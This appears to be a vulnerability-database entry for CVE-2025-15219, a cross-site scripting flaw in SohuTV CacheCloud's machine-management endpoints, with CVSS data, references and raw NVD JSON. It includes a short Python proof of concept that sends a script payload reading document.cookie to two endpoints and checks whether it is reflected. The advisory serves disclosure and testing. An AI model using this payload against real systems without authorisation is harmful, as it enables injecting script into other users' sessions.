CVE-2025-15219

Description

A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doMachineList/doPodList of the file src/main/java/com/sohu/cache/web/controller/MachineManageController.java. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:* - VULNERABLE

SohuTV CacheCloud <= 3.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-15219 PoC - SohuTV CacheCloud XSS Vulnerability
# Target: MachineManageController.java doMachineList/doPodList functions

target_url = "http://target-server/cachecloud"

# XSS payload for doMachineList function
xss_payload = '<script>alert(document.cookie)</script>'
encoded_payload = urllib.parse.quote(xss_payload)

# PoC for doMachineList endpoint
doMachineList_url = f"{target_url}/machineManage/doMachineList?machineName={encoded_payload}"

# PoC for doPodList endpoint
doPodList_url = f"{target_url}/machineManage/doPodList?podName={encoded_payload}"

print("[*] CVE-2025-15219 SohuTV CacheCloud XSS PoC")
print(f"[*] Target: {target_url}")
print(f"[*] Testing doMachineList endpoint...")

try:
    response = requests.get(doMachineList_url, timeout=10)
    if xss_payload in response.text or encoded_payload in response.text:
        print("[+] Potential XSS vulnerability detected!")
        print(f"[+] Vulnerable URL: {doMachineList_url}")
    else:
        print("[-] No obvious XSS reflection found")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

print(f"[*] Testing doPodList endpoint...")

try:
    response = requests.get(doPodList_url, timeout=10)
    if xss_payload in response.text or encoded_payload in response.text:
        print("[+] Potential XSS vulnerability detected!")
        print(f"[+] Vulnerable URL: {doPodList_url}")
    else:
        print("[-] No obvious XSS reflection found")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15219
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15219
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15219/
[4] VulDB https://vuldb.com/cve/CVE-2025-15219
[5] https://github.com/sohutv/cachecloud/issues/377
[6] https://github.com/sohutv/cachecloud/issues/378
[7] https://vuldb.com/?ctiid.338604
[8] https://vuldb.com/?id.338604
[9] https://vuldb.com/?submit.716318
[10] https://vuldb.com/?submit.716319

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15219", "sourceIdentifier": "[email protected]", "published": "2025-12-30T04:15:49.470", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doMachineList/doPodList of the file src/main/java/com/sohu/cache/web/controller/MachineManageController.java. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2", "matchCriteriaId": "5185073B-FF21-405B-9765-755B5C25BEBF"}]}]}], "references": [{"url": "https://github.com/sohutv/cachecloud/issues/377", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/sohutv/cachecloud/issues/378", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.338604", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338604", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716318", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716319", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}